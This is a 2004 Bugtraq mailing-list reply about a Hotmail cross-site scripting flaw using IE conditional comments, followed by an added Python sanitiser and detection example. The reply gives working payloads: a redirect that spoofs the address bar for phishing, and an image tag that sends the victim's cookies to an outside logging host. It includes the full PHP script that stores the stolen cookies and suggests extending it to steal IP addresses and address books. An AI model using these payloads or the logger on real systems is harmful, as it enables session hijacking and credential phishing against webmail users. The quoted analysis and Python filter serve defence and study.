Message-ID: <BAY5-F17gAHQbCRLCUh00100a85@hotmail.com>
Date: Sat, 17 Jul 2004 18:15:25 +0100
From: "Andrew Hunter" <andiroohunter@....com>
To: bugtraq@...urityfocus.com
Subject: Re: Hotmail Cross Site Scripting Vulnerability


I've just been looking at this Hotmail XSS attack; for people who couldn't 
get it to work, you need to set the MIME type to HTML.

I've looked at this issue with IE, and I've noticed another problem: if I 
send the line below to a Hotmail address, the URL gets spoofed.

<!--[if IE gte 5]><img 
src="javascript:window.location='http://www.google.com'"><![endif]-->

That will auto-redirect you to www.google.com, but look at the address bar; 
for me it says:

http://by5fd.bay5.hotmail.msn.com/cgi-bin/compose?type=r&curmbox=foobar&a=foobar&msg=foobar&start=foobar&len=foobar&curmbox=F000000001&a=foobar

OK, so what's good about a spoofed URL?
Well, it's from Hotmail; this will make for an EXTREMELY convincing phishing 
attack, since it's not hard to view the source of www.hotmail.com, use the 
find command and search for "form", and well, everyone can figure out what to 
do from there.

Also it's possible to steal the user's cookies using the following line:
<!--[if IE gte 5]><img 
src="javascript:window.location='http://www.yoursite.com/log.php?email=victimsaddress@hotmail.com&cookie=' 
+ document.cookie"><![endif]-->

Remember to type the victim's email address by hand, otherwise you won't know 
whose it is.

Content of log.php

<?php
$file="youpasswordlog.log";
if (isset($HTTP_GET_VARS["cookie"]) && isset($HTTP_GET_VARS["email"])) {

    $logcookie = $HTTP_GET_VARS["cookie"];
    $logcookie = rawurldecode($logcookie); //turns url encoding to normal text
    $logemail = $HTTP_GET_VARS["email"];
    $logemail = rawurldecode($logemail); //turns url encoding to normal text

    $handle=fopen($file, "r+");         //Opening the file to read the existing log
    $filecontence=fread($handle,filesize("$file"));
    fclose($handle);

    $handle=fopen($file, "w");   //Opening the file for writing
    fwrite($handle, "$logemail - $logcookie\n $filecontence\n ");
    //Writing email address and cookie then the rest of the log
    fclose($handle);
}
header("Location: http://www.hotmail.com");
?>

End of log.php

And of course you can add other stuff to log.php like an IP stealing 
function.

Also I think the possibilities are endless with this, since I think it's 
possible to use iframes and other JavaScript to split the document.location 
and get to the compose new message window and then load in addresses from 
the address book, but <script language="JavaScript"> tags like this still 
appear to be filtered. I think a number of img tags with JavaScript in 
them will continue to be run, not sure yet.

Thanks
Andiroo



>From: "GreyMagic Security" <security@...ymagic.com>
>To: "Paul" <paul@...yhats.cjb.net>, <bugtraq@...urityfocus.com>
>Subject: Re: Hotmail Cross Site Scripting Vulnerability
>Date: Sat, 17 Jul 2004 18:33:10 +0200
>Message-ID: <004001c46c1b$bfbb0c80$060010b0@...on>
>References: <20040715231607.11682.qmail@....securityfocus.com>
>
> >Hotmail Cross Site Scripting Vulnerability
>
>--snip--
>
> >Well, Hotmail was just nice enough to be a little lenient on what
> >goes in-between those 'if' tags. I suppose that's so MS Word can
> >send stuff through email to Hotmail customers without it getting
> >messed up.
>
>The problem is not "if" tags, the problem is the syntax in which they are
>represented in the document (HTML Comments). Hotmail doesn't check anything
>between HTML comments because it assumes they won't be processed by the
>browser, not because it tries to leave backdoors for MSO docs. Hotmail's
>assumption that HTML comments are safe collides with the well-documented
>concept of "conditional comments" by the very same company.
>
>See
>http://msdn.microsoft.com/workshop/author/dhtml/overview/ccomment_ovw.asp
>for more information.
>
>Btw, this will work just fine without any need for MSO trickery:
>
><!--[if IE gte 5]> <img src="javascript:alert()"> <![endif]-->
>
>Simply checks if IE's major version is equal or greater than 5 and executes
>the content if true (older versions don't have the conditional comments
>feature, but they're irrelevant market-share wise anyway).
>
>Cheers.

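The quoted GreyMagic analysis pins the flaw on a filter design rather than on the "if" syntax itself: anything inside an HTML comment was assumed inert and left unchecked, while IE treated conditional comments as live markup. The Python below is an added illustration for this archive page, not code from the thread, from Hotmail or from GreyMagic. It contrasts a filter built on that assumption with one that strips every comment and conditional marker before checking URI attributes, and adds a small detection helper for inbound-mail scanning. The sample messages are constructed here, modelled on the payload shapes shown in the thread, and every function and constant name is this example's own.

```python
import html
import re

# Constructed sample messages (not from the thread or any real mailbox).
CONDITIONAL_PAYLOAD = (
    "<p>hello</p>"
    '<!--[if IE gte 5]><img src="javascript:alert(1)"><![endif]-->'
)
PLAIN_PAYLOAD = '<img src="javascript:alert(1)">'
# Entity-encoded first letter plus an embedded tab: browsers decode and
# drop these before resolving the scheme, so a naive string match misses it.
OBFUSCATED_PAYLOAD = '<img src="&#x6A;ava\tscript:alert(1)">'
BENIGN = '<p>hi <img src="http://example.invalid/a.png"> <!-- a note --></p>'

COMMENT_RE = re.compile(r"<!--.*?-->", re.DOTALL)
# "Downlevel-revealed" conditional markers are not comments at all; drop them too.
DOWNLEVEL_RE = re.compile(r"<!\[(?:if|endif)[^>]*\]>", re.IGNORECASE)
CONDITIONAL_RE = re.compile(r"<!(?:--)?\[if\b", re.IGNORECASE)
URI_ATTR_RE = re.compile(
    r"""\s(src|href)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""", re.IGNORECASE
)


def is_script_uri(value: str) -> bool:
    """True if the attribute value becomes a script URI after the same
    normalisation a browser applies: entity decoding, removal of control
    and whitespace characters, case-insensitive scheme comparison."""
    v = html.unescape(value)
    v = re.sub(r"[\x00-\x20]", "", v).lower()
    return v.startswith(("javascript:", "vbscript:"))


def _drop_script_uris(fragment: str) -> str:
    """Remove any src/href attribute whose value is a script URI."""
    def repl(m):
        value = m.group(2) or m.group(3) or m.group(4) or ""
        return "" if is_script_uri(value) else m.group(0)
    return URI_ATTR_RE.sub(repl, fragment)


def naive_filter(doc: str) -> str:
    """Models the flawed design the thread describes: attribute checks run
    only on markup outside HTML comments, and comment bodies pass through
    untouched on the assumption that nothing inside them executes."""
    out, pos = [], 0
    for m in COMMENT_RE.finditer(doc):
        out.append(_drop_script_uris(doc[pos:m.start()]))
        out.append(m.group(0))  # comment copied verbatim, never inspected
        pos = m.end()
    out.append(_drop_script_uris(doc[pos:]))
    return "".join(out)


def hardened_filter(doc: str) -> str:
    """Strip every comment and conditional marker first, then check URI
    attributes over the whole remaining document, so no region of the
    input is exempt from inspection."""
    doc = COMMENT_RE.sub("", doc)
    doc = DOWNLEVEL_RE.sub("", doc)
    return _drop_script_uris(doc)


def has_conditional_comment(doc: str) -> bool:
    """Detection helper for mail scanning: flags IE conditional comments
    regardless of how the payload inside them is obfuscated."""
    return CONDITIONAL_RE.search(doc) is not None


if __name__ == "__main__":
    samples = [("conditional", CONDITIONAL_PAYLOAD), ("plain", PLAIN_PAYLOAD),
               ("obfuscated", OBFUSCATED_PAYLOAD), ("benign", BENIGN)]
    for name, sample in samples:
        print(f"{name:12} naive    -> {naive_filter(sample)!r}")
        print(f"{name:12} hardened -> {hardened_filter(sample)!r}")
        print(f"{name:12} flagged  -> {has_conditional_comment(sample)}")
```

The naive filter leaves the conditional-comment payload intact, while the hardened one reduces it to the harmless paragraph; both strip the plain `javascript:` image, and only the hardened one also catches the entity-encoded, tab-split variant because it normalises before comparing the scheme. Conditional comments were an IE-only feature and later IE versions dropped them, but the design lesson from the quoted reply is general: a sanitiser must not exempt any region of its input on the grounds that "the browser won't process that".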